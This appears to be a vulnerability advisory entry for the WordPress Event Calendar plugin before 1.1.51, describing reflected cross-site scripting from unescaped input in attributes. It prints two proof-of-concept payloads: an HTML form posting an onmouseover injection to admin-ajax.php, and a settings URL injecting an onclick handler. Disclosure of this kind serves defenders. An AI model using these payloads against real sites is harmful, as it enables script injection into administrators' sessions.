Event Calendar < 1.1.51 - Reflected Cross-Site Scripting

2021-12-2000:00:00

Krzysztof Zając

event calendar

cross-site scripting

reflected

security exploit

EPSS

0.001

Percentile

41.8%

JSON

The plugin does not escape some user input before outputting it back in attributes, leading to Reflected Cross-SIte Scripting issues

<html>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=ecwd_event_popup_ajax" method="POST">
        <input type="text" value='" onmouseover=alert(/XSS/) p' name="id">
        <input type="submit" value="Send">
    </form>
</html>

And move the mouse over the 'Untitled' text

(Firefox only): https://example.com/wp-admin/edit.php?post_type=ecwd_event&page=ecwd_general_settings&tab=%22+accesskey%3Dx+onclick%3Dalert%281%29+p

EPSS

0.001

Percentile

41.8%

JSON

Related for WPEX-ID:08864B76-D898-4DFE-970D-D7CC1B1115A7